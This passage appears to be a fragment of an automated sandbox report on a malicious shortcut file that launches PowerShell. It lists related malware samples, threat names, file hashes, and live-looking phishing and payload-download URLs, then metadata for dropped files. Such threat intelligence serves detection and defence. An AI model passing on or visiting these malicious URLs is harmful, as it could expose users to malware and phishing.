                                                                                                • Override analysis time to 240s for powershell
                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 66.102.1.84, 142.250.185.206, 216.58.212.131, 34.104.35.123, 184.28.90.27, 192.229.221.95, 93.184.221.240, 142.250.186.131, 142.250.184.238
                                                                                                • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6588 because it is empty
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                • VT rate limit hit for: jKSjtQ8W7O.lnk
                                                                                                TimeTypeDescription
                                                                                                12:58:21API Interceptor13515692x Sleep call for process: powershell.exe modified
                                                                                                12:58:23API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                188.114.97.3Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.rtprajalojago.live/7vun/
                                                                                                inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                • joxi.net/4Ak49WQH0GE3Nr.mp3
                                                                                                http://meta.case-page-appeal.eu/community-standard/208273899187123/Get hashmaliciousUnknownBrowse
                                                                                                • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                                                                9q24V7OSys.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP
                                                                                                QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • filetransfer.io/data-package/mfctuvFf/download
                                                                                                http://brawllstars.ru/Get hashmaliciousHTMLPhisherBrowse
                                                                                                • brawllstars.ru/
                                                                                                http://aktiivasi-paylaterr.from-resmi.com/Get hashmaliciousUnknownBrowse
                                                                                                • aktiivasi-paylaterr.from-resmi.com/
                                                                                                ECChG5eWfZ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                • homker11.uebki.one/GeneratorTest.php
                                                                                                HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
                                                                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • filetransfer.io/data-package/Ky4pZ0WB/download
                                                                                                162.159.135.234http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                  https://bafybeid655cmhe6uwb6wx3qrnokcfyddv63kcnzkm3whfn2xbjyyhukh2m.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                    http://via.evove.topGet hashmaliciousUnknownBrowse
                                                                                                      test.exeGet hashmaliciousUnknownBrowse
                                                                                                        windisc.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                          SecuriteInfo.com.Other.Malware-gen.12648.25881.elfGet hashmaliciousUnknownBrowse
                                                                                                            SecuriteInfo.com.Win32.TrojanX-gen.3459.12800.exeGet hashmaliciousUnknownBrowse
                                                                                                              SecuriteInfo.com.Win64.SpywareX-gen.2363.7900.exeGet hashmaliciousUnknownBrowse
                                                                                                                ChromeInstallerOnline.exeGet hashmaliciousDicrord RatBrowse
                                                                                                                  aBtQ4Tt70g.exeGet hashmaliciousDicrord RatBrowse
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    gateway.discord.gghttps://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                                    • 162.159.136.234
                                                                                                                    https://mjj.aigc369.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 162.159.133.234
                                                                                                                    http://relay.csgoze520.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 162.159.136.234
                                                                                                                    Client-built.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                    • 162.159.130.234
                                                                                                                    Client-built.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                    • 162.159.133.234
                                                                                                                    87Bym0x4Fy.exeGet hashmaliciousBlank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                    • 162.159.130.234
                                                                                                                    Client-built.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                    • 162.159.134.234
                                                                                                                    Client-built.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                    • 162.159.133.234
                                                                                                                    QMGuBtu724.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 162.159.133.234
                                                                                                                    Client-built.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 162.159.134.234
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    CLOUDFLARENETUSSv6eQZzG0Z.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                    • 162.159.135.234
                                                                                                                    http://oiut-hbhgvgcvgcfcfcxbh.s3-website.us-east-2.amazonaws.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 104.17.25.14
                                                                                                                    HdXeCzyZD9.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    update SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    NCTSgL4t0B.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                    • 104.21.84.213
                                                                                                                    https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                    • 104.21.1.169
                                                                                                                    4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    CLOUDFLARENETUShttp://oiut-hbhgvgcvgcfcfcxbh.s3-website.us-east-2.amazonaws.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 104.17.25.14
                                                                                                                    HdXeCzyZD9.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    update SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    NCTSgL4t0B.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                    • 104.21.84.213
                                                                                                                    https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                    • 104.21.1.169
                                                                                                                    4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                    • 188.114.96.3
                                                                                                                    CYBERNET-APCyberInternetServicesPvtLtdPKfirmware.i586.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 124.29.195.152
                                                                                                                    xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 58.65.218.110
                                                                                                                    LisectAVT_2403002B_136.dllGet hashmaliciousEmotetBrowse
                                                                                                                    • 175.107.196.192
                                                                                                                    RiI7W2cj7p.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 175.107.255.200
                                                                                                                    SHIPMENT-CMA CGM-1DBSIE1P-DOCX.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 72.255.53.7
                                                                                                                    SHIPMENT-CMA CGM XIAMEN-1DBSIE1PL- EX1-DOCX.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 72.255.53.7
                                                                                                                    rCjg912Ssb.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 103.213.114.223
                                                                                                                    Scanned Documents.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 72.255.53.7
                                                                                                                    Newly Arrived Shipping Document.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 72.255.53.7
                                                                                                                    RECEIPT-CARGO-00098GHG-DOCX.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 72.255.53.7
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    1138de370e523e824bbca92d049a3777https://formacionadieste.com.de/Vrvz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 23.206.229.226
                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                    • 23.206.229.226
                                                                                                                    https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAILGet hashmaliciousUnknownBrowse
                                                                                                                    • 23.206.229.226
                                                                                                                    https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 23.206.229.226
                                                                                                                    http://hrlaw.com.auGet hashmaliciousUnknownBrowse
                                                                                                                    • 23.206.229.226
                                                                                                                    Advisory23-UCDMS04-11-01.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                    • 23.206.229.226
                                                                                                                    https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 23.206.229.226
                                                                                                                    https://pokegamaclub.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 23.206.229.226
                                                                                                                    https://ole798.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 23.206.229.226
                                                                                                                    https://mukirecords.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 23.206.229.226
                                                                                                                    28a2c9bd18a11de089ef85a160da29e4Sv6eQZzG0Z.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                    • 52.165.165.26
                                                                                                                    https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 52.165.165.26
                                                                                                                    https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=trueGet hashmaliciousUnknownBrowse
                                                                                                                    • 52.165.165.26
                                                                                                                    http://servicesnaustraliagov.info/adminGet hashmaliciousUnknownBrowse
                                                                                                                    • 52.165.165.26
                                                                                                                    https://serrespec.weebly.com/tc2000-stock-charting-software.htmlGet hashmaliciousUnknownBrowse
                                                                                                                    • 52.165.165.26
                                                                                                                    https://formacionadieste.com.de/Vrvz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 52.165.165.26
                                                                                                                    http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 52.165.165.26
                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                    • 52.165.165.26
                                                                                                                    Purchase Order IBT LPO-2320.emlGet hashmaliciousUnknownBrowse
                                                                                                                    • 52.165.165.26
                                                                                                                    https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAILGet hashmaliciousUnknownBrowse
                                                                                                                    • 52.165.165.26
                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eSv6eQZzG0Z.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    • 162.159.135.234
                                                                                                                    sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    • 162.159.135.234
                                                                                                                    0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    • 162.159.135.234
                                                                                                                    https://formacionadieste.com.de/Vrvz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    • 162.159.135.234
                                                                                                                    file.exeGet hashmaliciousXWorm, XmrigBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    • 162.159.135.234
                                                                                                                    Purchase Order IBT LPO-2320.emlGet hashmaliciousUnknownBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    • 162.159.135.234
                                                                                                                    https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAILGet hashmaliciousUnknownBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    • 162.159.135.234
                                                                                                                    3140, EUR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    • 162.159.135.234
                                                                                                                    UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    • 162.159.135.234
                                                                                                                    7LC2izrr9u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                    • 188.114.97.3
                                                                                                                    • 162.159.135.234
                                                                                                                    No context
                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1310720
                                                                                                                    Entropy (8bit):0.8304424878761655
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAA:RJE+Lfki1GjHwU/+vVhWqp+
                                                                                                                    MD5:32463685792E2FE6E59ACD87798F2112
                                                                                                                    SHA1:DFE9DF4EBDF2AA79C2A8A9CF0CE31E1A70FA67B4
                                                                                                                    SHA-256:BFBDEBD5E7EC6B4BB8B7B1A37FAF9F9160DC9EAA2980315F13A54908BA5325DD
                                                                                                                    SHA-512:EF171F47F1748653881C723D103174370E1966B22D0DD9EAF5E5CC59F2E099943AF3E9043721A457BF0D10554E9F680C55BD9B3499E9936E5D57CE65B8DE1F37
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8352e665, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1048576
                                                                                                                    Entropy (8bit):0.9433046920941188
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:bSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:bazaHvxXy2V2UR
                                                                                                                    MD5:E806AF514B0CEC9A55137DAAD459EA87
                                                                                                                    SHA1:184FE0BFE1C2A055D0474677AEFD670BA967DF41
                                                                                                                    SHA-256:69436385144EAFEF018BA110C5EEEE89D5F9633BBAC3782F881FD75EAAB97D32
                                                                                                                    SHA-512:48018B7CE5ED0629A546A0C6578EABA2FE0BF23F72A19CF4DEBEBE05B81E34D450A6AC77D52B6B499ED639B6319C632C8E8CCFC67CD583F1DED9A040282F4E20
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:.R.e... ...............X\...;...{......................0.x...... ...{s..:...|..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{.......................................:...|...................<N..:...|...........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):16384
                                                                                                                    Entropy (8bit):0.08070612585527372
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:jS/yYeKdV9Xgvll/nqlFcl1ZUllll44d7sC/qllGBnX/l/Tj/k7/t:jiyzcVcll/qlFclQ/le4dV2254
                                                                                                                    MD5:02BC769436FB0EC8367C4411A355C6A6
                                                                                                                    SHA1:29D385FDC5AB787F7860623BEB7CF5E34A9A103A
                                                                                                                    SHA-256:B389A8E485F013A0E33DB868FD8D56639D710BAB9FF9BA0CD063F7052085146F
                                                                                                                    SHA-512:6496442783B5971806F5D02FB69DC24AFE3B4D59B2286BE71C2A455D69CFB24ED9D25F8CE9A84686F15A85B406B3C68614637F18E7BB1C2A9D7E93B358742363
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:.o,......................................;...{...:...|... ...{s.......... ...{s.. ...{s.P.... ...{s..................<N..:...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):11608
                                                                                                                    Entropy (8bit):4.890472898059848
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                                    MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                                    SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                                    SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                                    SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                                    Malicious:false
                                                                                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):3092
                                                                                                                    Entropy (8bit):5.500265952464292
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:xAzlHyIFKL2O9qrh7KCDpuTJ5Eo9AdrxQgP:a1yt2jrACluTLL2NP
                                                                                                                    MD5:4AFF37FF69E58E0F335B93C3E04D1340
                                                                                                                    SHA1:9389955E675540FEBC3491813EB946E10EA4EFCE
                                                                                                                    SHA-256:21B4652587BE83B99B2065FB8DED25C8B8656505D40BF93F0328CCFAC12ABBEA
                                                                                                                    SHA-512:569E252207D6537B9B4F3DD854BCC15FEA41A7D5B3F1690755B6179AD0B713D0F2A0B588FB4AABCBB4028BE62459AEDFA10F8D973C7B6101CCCF41F659E947B0
                                                                                                                    Malicious:false
                                                                                                                    Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4601
                                                                                                                    Entropy (8bit):3.789183730177295
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:ySuP55ohDL16el1gSogZoaRjL16elegSogZoal1:yS65SZL16e1HnpL16e8Hnj
                                                                                                                    MD5:0E1A6CFAD9FA713FA9D626EA9114B866
                                                                                                                    SHA1:96C1ADF3D6754840AA3CCF0F41495ABC91DB1054
                                                                                                                    SHA-256:14074F8BBFFD6E42CE4226FFF15F8CAD034D6FE4729FEA921F6F830317276E5D
                                                                                                                    SHA-512:36E9AB75132E1F72B54CB5BBBC222A29C0398395C89A8E5191F7396D21345E2942CEC336A3FEA32EED6BAC11E2C056A67127BD0D63252BBAD0155708ADECC4E7
                                                                                                                    Malicious:false
                                                                                                                    Preview:...................................FL..................F. .. ...X.u.g....d..Y...X27.Y................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........Yd.....0.g....d..Y.....j.2.....>YI. .JKSJTQ~1.LNK..N......EW.D>YI......$.....................>W.j.K.S.j.t.Q.8.W.7.O...l.n.k.......U...............-.......T..............y.....C:\Users\user\Desktop\jKSjtQ8W7O.lnk..9.%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.`.......X.......632922...........hT..CrF.f4... ..C..Yc...,...E...hT..CrF.f4... ..C..Yc...,...E..........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....U$..f....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.D..Windows.@......OwH>YI.....3........................W.i.n.d.o.w.s.....Z.1.....>YF...Sy
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4601
                                                                                                                    Entropy (8bit):3.789183730177295
